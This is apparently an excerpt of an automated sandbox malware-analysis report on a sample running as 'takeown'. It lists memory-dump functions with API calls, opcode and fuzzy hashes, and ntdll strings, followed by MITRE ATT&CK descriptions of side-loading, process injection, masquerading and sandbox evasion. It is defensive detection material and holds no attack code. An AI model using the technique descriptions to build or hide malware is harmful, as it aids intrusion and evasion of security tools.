Opcode ID: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction ID: 72afa8e6e8bfe8fc54ec358d591df057795dd618efefa549396a3585c7d85c0b
Opcode Fuzzy Hash: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction Fuzzy Hash: 4001C4B5D0020EAFDB00CBA0DC41FDABB749F55758F004199DE0897141F631E719CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02F140A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F14112

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction ID: c6be29f2ab26a01ec1a76c0b9c280c7890d5bd2bbc9824727e53bbe6d2b6fe25
Opcode Fuzzy Hash: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction Fuzzy Hash: 84015EB5D0020DABDF10DBA4DC41FDDB3789B44748F004194EA08A7241F631EB18CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F28040 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,02F17993,00000010,?,?,?,00000044,?,00000010,02F17993,?,?,?), ref: 02F280A0

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 871802d037cf03b1b75e86a374d2ab1772f5dafadbb207b0dbb7236ba7ea4e42
Instruction ID: 0b39d5aa92d1ee79b11ee8db61b6c078ecc4fe2a1de9ed36ce851e9fafddee37
Opcode Fuzzy Hash: 871802d037cf03b1b75e86a374d2ab1772f5dafadbb207b0dbb7236ba7ea4e42
Instruction Fuzzy Hash: 6101CCB2205108BBCB44DE89DC80EEB77AEEF8C754F408208BA09E3240D630F8518BB4

Uniqueness

Uniqueness Score: -1.00%

Function 02F09230 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F09275

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 791f8d8c3fcce41ebaad8a6ea7e2aff92c5f62a32c50d6d3d6326be9086c9953
Instruction ID: e270a8ca5d99ae759410ba36256c5bbc46c0cd49788753e5180c92464b508a2c
Opcode Fuzzy Hash: 791f8d8c3fcce41ebaad8a6ea7e2aff92c5f62a32c50d6d3d6326be9086c9953
Instruction Fuzzy Hash: 22F06D3339021436E360A6E99C02FD7B38CCF81BA5F140429FB0CEB1C0E995B84186E5

Uniqueness

Uniqueness Score: -1.00%

Function 02F27FB0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,0007A086,00000007,00000000,00000004,00000000,02F13977,000000F4,?,?,?,?,?), ref: 02F27FEF

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction ID: 838f4d6544963c846eabc283a74407313cb71fa7ae00688942c6b84149c7c557
Opcode Fuzzy Hash: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction Fuzzy Hash: 2DE092762002047BD710EF59DC40F9B73ADEFC9790F004418FA18A7240C770B9118BB8

Uniqueness

Uniqueness Score: -1.00%

Function 02F27F60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02F112E9,?,02F24AB7,02F112E9,02F242E7,02F24AB7,?,02F112E9,02F242E7,00001000,?,?,02F297ED), ref: 02F27F9C

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction ID: 00da6b96108f9f0e2ce3df820c8d8cd8783c0e99686678348cd1ebb0fb27176d
Opcode Fuzzy Hash: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction Fuzzy Hash: 81E06D712002047BC610EF58DC45FAB77ADEF85790F004018FA18A7281D7B0B9108AB8

Uniqueness

Uniqueness Score: -1.00%

Function 02F179D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02F179FC

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f0a5bd4e03653511d90ad7e61f4b975f3034743a01614326fa090b4a8e292b24
Instruction ID: 93129f11709bfa308cb5a851ef79d078f430a44e3ca32d06c9d8fe7f26e829c8
Opcode Fuzzy Hash: f0a5bd4e03653511d90ad7e61f4b975f3034743a01614326fa090b4a8e292b24
Instruction Fuzzy Hash: 75E0263264420827EB20BAA8DC41F6233488B8C7A8F680A60FB1CDB2D1EB79F6018150

Uniqueness

Uniqueness Score: -1.00%

Function 02F177D8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02F115D0,02F26A07,02F242E7,?), ref: 02F17813

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8fa1b476f35eae32b4464f113ed3e77fe687cd0a4fa3c7878d6b3ca01f398b19
Instruction ID: f13859c5e2b45a5ca0620428cefd75fe501850b1b19bc03e0f9e0b10157c52f1
Opcode Fuzzy Hash: 8fa1b476f35eae32b4464f113ed3e77fe687cd0a4fa3c7878d6b3ca01f398b19
Instruction Fuzzy Hash: C7E07D71584201BFF740A7A0EC02F6532449B60389F208474F64CD62C1DF25A101CE10

Uniqueness

Uniqueness Score: -1.00%

Function 02F177E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02F115D0,02F26A07,02F242E7,?), ref: 02F17813

Memory Dump Source

Source File: 00000007.00000002.4157652949.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f00000_takeown.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 57a7ed3940c5e854b0736bf77c4bb181d6d74a4e5ea863a2671015bb8ec5f508
Instruction ID: beb69d30f721e0f50a6b7feb54f828f3d665006b39b51eb5c93611aaa351fec5
Opcode Fuzzy Hash: 57a7ed3940c5e854b0736bf77c4bb181d6d74a4e5ea863a2671015bb8ec5f508
Instruction Fuzzy Hash: B9D05E726803043BFA80E6A49C02F56328D8B51798F548464BA4CEB2C2EF55F100CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 03782C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03782C24

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5190955c40a1f1ba294a44b847b7e928676fab0ea23bcbc1a5b386171b3d1f7
Instruction ID: 21400815af9006aabd99a09c7e7256b7fffbcbc04920c0dacac2f66aae37c698
Opcode Fuzzy Hash: d5190955c40a1f1ba294a44b847b7e928676fab0ea23bcbc1a5b386171b3d1f7
Instruction Fuzzy Hash: 69B09B719415C5D5FF11F76056087177944A7D1701F19C572D2034655F4739C1D1E176

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03782890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0378293C
___swprintf_l.LIBCMT ref: 0378295E
___swprintf_l.LIBCMT ref: 037829A3
___swprintf_l.LIBCMT ref: 037BA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 037BA54E
ffff:, xrefs: 037BA504
::%hs%u.%u.%u.%u, xrefs: 037BA527
:%u.%u.%u.%u, xrefs: 037BA5B8

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: bd16d39041baf369226300c36f2c609d969829fc417ea07bb96952082de2dd94
Instruction ID: e01570d5da915588f770ca05a2487649029482568beadc52b35482e72f78ca77
Opcode Fuzzy Hash: bd16d39041baf369226300c36f2c609d969829fc417ea07bb96952082de2dd94
Instruction Fuzzy Hash: AC510BB6A00116BFDF20EF9CC88097EF7B8BF092017148669E465D7642D334DE509BE0

Uniqueness

Uniqueness Score: -1.00%

Function 037F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 037F24A6
___swprintf_l.LIBCMT ref: 037F24E2
___swprintf_l.LIBCMT ref: 037F257D
___swprintf_l.LIBCMT ref: 037F25A3
___swprintf_l.LIBCMT ref: 037F25C8
___swprintf_l.LIBCMT ref: 037F2608

Strings

:%u.%u.%u.%u, xrefs: 037F25FF
ffff:, xrefs: 037F247D, 037F249D
::ffff:0:%u.%u.%u.%u, xrefs: 037F24DA
::%hs%u.%u.%u.%u, xrefs: 037F249E

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 6fd5760085011d87f657bca6e53c7f48ee186d04c8a84bd2e84a013fdb188764
Instruction ID: a363d643a7a812c396ee85aa51216b4f3f2a8f9608331d363fda367a4ef85037
Opcode Fuzzy Hash: 6fd5760085011d87f657bca6e53c7f48ee186d04c8a84bd2e84a013fdb188764
Instruction Fuzzy Hash: 4D51C5B9A04A45AFDB30DF9CC89097EB7F9FB44200B44889AE695D7742D7B4DE40C760

Uniqueness

Uniqueness Score: -1.00%

Function 03777630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 037B4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037B4655
CLIENT(ntdll): Processing section info %ws..., xrefs: 037B4787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037B46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037B4742
ExecuteOptions, xrefs: 037B46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037B4725

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a6ee524df90509d98de73016677cd401415779926eef7bca388710182ee93626
Instruction ID: ad9b3d541982f6641945060cd8d8bd514868b322e7d7d2ffb01dcde733d830b4
Opcode Fuzzy Hash: a6ee524df90509d98de73016677cd401415779926eef7bca388710182ee93626
Instruction Fuzzy Hash: 0A51F475A00359BADF24EBA9DC89BFEB7B8AF04300F0404EDE505EB181E771AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0378B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0378B6BF

Strings

0, xrefs: 0378B695
0, xrefs: 0378B66F
+, xrefs: 0378B65A
-, xrefs: 0378B650

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 1df62f78208a3f8d1f9f0bf528ba36f0abc98040292b8286f3efb57a09663646
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 9081BF70E852499EDF24EF68C8917FEBBB6AF45320F1C465ED861A7391C73498408B54

Uniqueness

Uniqueness Score: -1.00%

Function 0376F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037B02E7
RTL: Re-Waiting, xrefs: 037B031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037B02BD

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 6d040afb70de39f0400df20f07136f965388b6669d92929cbf49c61458526643
Instruction ID: 72f876741d27b98f8fade471cbc0e238915106f101f4de17839cbfc75e604cb7
Opcode Fuzzy Hash: 6d040afb70de39f0400df20f07136f965388b6669d92929cbf49c61458526643
Instruction Fuzzy Hash: 1DE1DD306087419FD725CF28D898B6AB7F0BF89314F180AADF9A58B2E1D774D844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0377BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 037B7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 037B7B7F
RTL: Re-Waiting, xrefs: 037B7BAC

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: c3bd7498670152b85a86ab3ab7a817e0c50b1600c7c78563c2a0621b6d7a634d
Instruction ID: dd826d2a1013adbb58a08e1811d993d827b49c4f01087d411dbbcb5e62a6cfef
Opcode Fuzzy Hash: c3bd7498670152b85a86ab3ab7a817e0c50b1600c7c78563c2a0621b6d7a634d
Instruction Fuzzy Hash: AB41D1353047429FDB24DE29C840B6BB7E5EF89B10F140A1DF95ADB680DB71E9068F91

Uniqueness

Uniqueness Score: -1.00%

Function 0377B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037B728C

Strings

RTL: Resource at %p, xrefs: 037B72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 037B7294
RTL: Re-Waiting, xrefs: 037B72C1

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 4cca09e0a7c3090e36d3a21b0cb8f107b432f56414b61c1afdd992fdb5927186
Instruction ID: f5fda35de5743c7bdbd8394382c13119534bd5e0c9c772ba0ac299b2820e243a
Opcode Fuzzy Hash: 4cca09e0a7c3090e36d3a21b0cb8f107b432f56414b61c1afdd992fdb5927186
Instruction Fuzzy Hash: 4441DF36600346AFCB24DE25CC41BAAB7B5FF84710F180619F995EB240DB31E852DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 037F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 037F238D
___swprintf_l.LIBCMT ref: 037F23B3

Strings

%%%u, xrefs: 037F2384
]:%u, xrefs: 037F23AA

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 3e3eddd60f62e02dc44122b2e3a2e8ea6d7265090c7bf8da08410a68f494fe82
Instruction ID: e423a26d558b3bc521fc1092b5a4005f576b1e4b60ce68f1b3eec11152404377
Opcode Fuzzy Hash: 3e3eddd60f62e02dc44122b2e3a2e8ea6d7265090c7bf8da08410a68f494fe82
Instruction Fuzzy Hash: F4319ABAA00619AFDB20DF29DC40BEEB7F8FF44610F440956E949D7201EB30DA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 03787D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03787E8B

Strings

-, xrefs: 03787DDD
+, xrefs: 03787DE8

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 425fb312e485e6fc30d4ba6ee802e8175cdac4dd1aeced5d0a16227c2897c878
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 3E91B771E80259DBDF28EF6AC8816BEB7A5FF44320F78451AE866E72C0D7309941C721

Uniqueness

Uniqueness Score: -1.00%

Function 03749126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03749175
$, xrefs: 03749191

Memory Dump Source

Source File: 00000007.00000002.4170974055.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true

Associated: 00000007.00000002.4170974055.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4170974055.00000000038AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3710000_takeown.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 6eb29d0c945ca7fba0dfd5ad4a8a39cbd78b2233631662c8dfec907397834aa6
Instruction ID: 833aad523ee82916247e67f4ce1eb8cb1924f4a46fa30f0a19c5b6e6f0eef853
Opcode Fuzzy Hash: 6eb29d0c945ca7fba0dfd5ad4a8a39cbd78b2233631662c8dfec907397834aa6
Instruction Fuzzy Hash: AE814D75D006699BDB35DB54CC44BEEB7B8AF48710F0446EAEA19B7640E7706E80CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

